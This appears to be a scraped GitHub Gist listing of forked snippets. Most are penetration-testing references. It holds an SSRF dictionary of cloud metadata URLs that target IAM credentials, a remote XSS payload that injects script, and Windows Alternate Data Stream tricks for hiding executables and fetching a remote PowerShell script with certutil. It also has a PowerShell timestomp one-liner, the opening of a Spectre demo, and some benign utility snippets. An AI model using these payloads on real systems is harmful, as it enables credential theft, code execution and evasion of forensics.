JavaScript Code
var str = "hi";Memory allocation:
| Address | Value | Description |
|---|---|---|
...... |
... |
Nur Gucu nuryslyrt
🌟
nuryslyrt
/ cloud_metadata.txt
Created
December 21, 2017 14:03
— forked from 0xBADCA7/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
nuryslyrt
/ XSS-payload.html
Created
February 26, 2018 20:55
— forked from bl4de/XSS-payload.html
Remote XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s); | |
| setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s); | |
| s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()> |
nuryslyrt
/ web-servers.md
Created
March 10, 2018 13:28
— forked from willurd/web-servers.md
Big list of http static server one-liners
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
nuryslyrt
/ gist:f76bf436801e65e85d2a818140d00a63
Created
April 2, 2018 08:22
— forked from casschin/gist:1990245
Python webdriver api quick sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Locating UI elements ### | |
| # By ID | |
| <div id="coolestWidgetEvah">...</div> | |
| element = driver.find_element_by_id("coolestWidgetEvah") | |
| or | |
| from selenium.webdriver.common.by import By | |
| element = driver.find_element(by=By.ID, value="coolestWidgetEvah") | |
| # By class name: |
nuryslyrt
/ kill_with_pid_awk_sed.sh
Created
April 3, 2018 11:03
— forked from v9n/kill_with_pid_awk_sed.sh
Kill a procees with pid getting on the fly via awk
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #For example, we want to kill Netbeans | |
| ps -ef | grep beans | awk ' $6 != "ttys000" {print$2;}' | xargs kill {} | |
| #Or get the first line only (to aovid getting grep command itself) | |
| ps -ef | grep beans | head -n 1 | awk ' {print$2}' | xargs kill {} |
nuryslyrt
/ Exe_ADS_Methods.txt
Created
April 20, 2018 12:47
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Add content to ADS | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
nuryslyrt
/ spectre.c
Created
May 5, 2018 09:28
— forked from ErikAugust/spectre.c
Spectre example code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
nuryslyrt
/ bitsadmin.md
Created
June 15, 2018 13:51
— forked from rosswd/bitsadmin.md
Use bitsadmin to download via the command line on Windows 7 (8?)
If you want to test your connection or have some other reason to use the command line to download a file, this is how.
See http://superuser.com/a/284147 for more information.
Open cmd.exe and use this format:
bitsadmin /transfer debjob /download /priority normal http://cdimage.debian.org/debian-cd/current-live/i386/iso-hybrid/debian-live-8.7.1-i386-xfce-desktop.iso D:\Users\[Username]\Downloads\debian-live-8.7.1-i386-xfce-desktop.iso
nuryslyrt
/ gist:fb8e281eb24711adf137a6cfbc67ed45
Created
June 15, 2018 14:14
— forked from obscuresec/gist:7b0cf71d7a8dd5e7b54c
PowerShell TimeStomp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date} |